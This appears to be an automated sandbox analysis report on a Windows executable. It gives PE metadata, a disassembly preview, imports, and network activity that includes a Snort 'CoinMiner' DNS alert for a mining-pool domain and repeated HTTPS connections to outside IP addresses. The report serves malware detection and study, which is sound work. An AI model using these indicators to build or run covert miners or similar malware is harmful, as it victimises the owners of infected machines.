TLSH:	9487338023021932F6A94179E79C640AEFF5F636A7D5666357E043B32F43B92C628F53
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x14000c540
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6655CB4C [Tue May 28 12:17:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	f4f2e2b03fe5666a721620fcea3aea9b

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F92C12054ACh
dec eax
add esp, 28h
jmp 00007F92C12050CFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F92C1205A24h
test eax, eax
je 00007F92C1205273h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F92C1205257h
dec eax
cmp ecx, eax
je 00007F92C1205266h
xor eax, eax
dec eax
cmpxchg dword ptr [00034FACh], ecx
jne 00007F92C1205240h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F92C1205249h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F92C1205259h
mov byte ptr [00034F95h], 00000001h
call 00007F92C1205831h
call 00007F92C1205E38h
test al, al
jne 00007F92C1205256h
xor al, al
jmp 00007F92C1205266h
call 00007F92C1213DCFh
test al, al
jne 00007F92C120525Bh
xor ecx, ecx
call 00007F92C1205E48h
jmp 00007F92C120523Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [00034F5Ch], 00000000h
mov ebx, ecx
jne 00007F92C12052B9h
cmp ecx, 01h
jnbe 00007F92C12052BCh
call 00007F92C120599Ah
test eax, eax
je 00007F92C120527Ah
test ebx, ebx
jne 00007F92C1205276h
dec eax
lea ecx, dword ptr [00034F46h]
call 00007F92C1213BC2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3e0bc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0xeb4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x43000	0x231c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0x758	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b460	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3b320	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2c000	0x438	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2afb0	0x2b000	40bf1edebd1304ce1b08c50cb556d4db	False	0.5458416606104651	data	6.5002315273868	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2c000	0x12f36	0x13000	0904c2e66ce6b6bb1e0de054e88ceb30	False	0.5160875822368421	data	5.827951258090788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3f000	0x33b8	0xe00	ae0f42b168987b17129506ccc4960b21	False	0.13392857142857142	firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes	1.8264700601019173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x43000	0x231c	0x2400	ffc5390666982cab67e3c9bf8e263bc3	False	0.4784071180555556	data	5.382434020909434	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x46000	0x1f4	0x200	771f0b097891d31289bb68f0eb426e66	False	0.529296875	data	3.713242247775091	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0xeb4	0x1000	47d8e897636a16013dcfc0453b14792d	False	0.407958984375	data	5.340979003299043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0x758	0x800	7ecf18b15822e1aa4c79b9a361f07c79	False	0.546875	data	5.250941834312499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x470e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.39305054151624547
RT_GROUP_ICON	0x47990	0x14	data	1.15
RT_MANIFEST	0x479a4	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetModuleFileNameW, CreateSymbolicLinkW, GetCPInfo, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, GetProcAddress, GetSystemTimeAsFileTime, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/05/24-03:56:42.216265	UDP	2036289	ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	61625	53	192.168.2.4	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 5, 2024 03:56:27.328036070 CEST	49745	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:27.333034039 CEST	80	49745	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:27.333112001 CEST	49745	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:27.334147930 CEST	49745	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:27.338979006 CEST	80	49745	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:27.933069944 CEST	80	49745	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:28.070555925 CEST	49745	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:28.972179890 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:28.972270012 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:28.972373962 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:28.989514112 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:28.989564896 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.598455906 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.598656893 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:29.600593090 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:29.600625038 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.600899935 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.656549931 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:29.700575113 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.832097054 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.832321882 CEST	443	49746	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:29.832597971 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:29.871469021 CEST	49746	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:33.592907906 CEST	49745	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:40.129899979 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:40.134752035 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:40.134882927 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:40.134970903 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:40.139765024 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030531883 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030555010 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030571938 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030631065 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030726910 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:41.030726910 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:41.030833960 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030848026 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030863047 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030884027 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030900002 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030905962 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.030926943 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:41.031006098 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:41.031260014 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.032826900 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:41.034902096 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:41.034924984 CEST	443	49749	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:41.035104036 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:41.038224936 CEST	80	49748	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:41.039174080 CEST	49748	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:41.054214954 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:41.054231882 CEST	443	49749	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:41.656369925 CEST	443	49749	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:41.656867027 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:41.656887054 CEST	443	49749	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:41.658360004 CEST	443	49749	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:41.658838034 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:41.660531044 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:41.660531044 CEST	49749	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:42.008409977 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:42.013492107 CEST	80	49750	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:42.013706923 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:42.013809919 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:42.018601894 CEST	80	49750	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:42.576900959 CEST	49752	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:42.581825972 CEST	80	49752	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:42.581907988 CEST	49752	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:42.581944942 CEST	49752	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:42.586826086 CEST	80	49752	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:42.602694988 CEST	80	49750	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:42.753962040 CEST	49750	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:43.121025085 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.121062040 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.121170998 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.161906004 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.161931038 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.200323105 CEST	80	49752	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:43.320601940 CEST	49752	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:43.681196928 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:43.681282997 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:43.681364059 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:43.707135916 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:43.707237005 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:43.762628078 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.762695074 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.765248060 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.765256882 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.765469074 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.779722929 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.824491978 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.904519081 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.904731035 CEST	443	49753	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:43.906258106 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:43.907957077 CEST	49753	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:44.550458908 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.551034927 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.551106930 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.552824974 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.553000927 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.554209948 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.554352999 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.554553986 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.554553986 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.554655075 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.554718018 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.617599010 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.866913080 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.866975069 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.867115974 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.867182016 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.868026018 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.868172884 CEST	443	49754	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.868238926 CEST	49754	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.869429111 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.869477034 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:44.869537115 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.904984951 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:44.905006886 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.739866018 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.740199089 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:45.740228891 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.743758917 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.743825912 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:45.744935036 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:45.745019913 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.745230913 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:45.745239973 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.745261908 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:45.745274067 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.952544928 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:45.952616930 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:46.660264015 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:46.660315990 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:46.660357952 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:46.660379887 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:46.660926104 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:46.661003113 CEST	443	49755	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:46.661056042 CEST	49755	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:46.661304951 CEST	49752	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:46.668256998 CEST	80	49752	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:46.668315887 CEST	49752	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:49.623342991 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:49.628956079 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:49.629060030 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:49.629136086 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:49.634280920 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:49.745934010 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:49.745971918 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:49.746085882 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:49.747168064 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:49.747184992 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:50.715728045 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:50.715903997 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:50.806344032 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806404114 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806441069 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806477070 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806495905 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.806509018 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806531906 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.806545019 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806577921 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806615114 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806619883 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.806742907 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806778908 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.806786060 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.807215929 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.809624910 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.814996004 CEST	80	49757	216.58.212.132	192.168.2.4
Jun 5, 2024 03:56:50.815042019 CEST	49757	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:56:50.816859961 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:50.816883087 CEST	443	49759	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:50.816962957 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:50.848973989 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:50.849023104 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:50.850019932 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:50.850992918 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:50.851505041 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:50.851516962 CEST	443	49759	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:50.892537117 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.092052937 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.094357967 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.094368935 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.095309973 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.095314980 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.096350908 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.096358061 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.096468925 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.096473932 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.377609968 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.378315926 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.378417015 CEST	443	49758	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.378478050 CEST	49758	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.389175892 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.389300108 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.389381886 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.389780045 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:51.389863968 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:51.456732035 CEST	443	49759	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:51.457202911 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:51.457215071 CEST	443	49759	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:51.460840940 CEST	443	49759	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:51.460910082 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:51.462716103 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:51.462884903 CEST	49759	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:52.259562016 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.259737015 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.262702942 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.262759924 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.263509035 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.264822006 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.308577061 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.527116060 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.527286053 CEST	443	49760	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.527693033 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.528955936 CEST	49760	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.594485998 CEST	49761	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.594558954 CEST	443	49761	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:52.594625950 CEST	49761	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.594870090 CEST	49761	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:52.594892025 CEST	443	49761	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:53.435909033 CEST	443	49761	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:53.437654972 CEST	49761	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:53.437673092 CEST	443	49761	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:53.702991009 CEST	443	49761	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:53.703156948 CEST	443	49761	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:53.703221083 CEST	49761	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:53.703520060 CEST	49761	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:53.770761013 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:53.770823002 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:53.770895958 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:53.771166086 CEST	49762	443	192.168.2.4	149.154.167.220
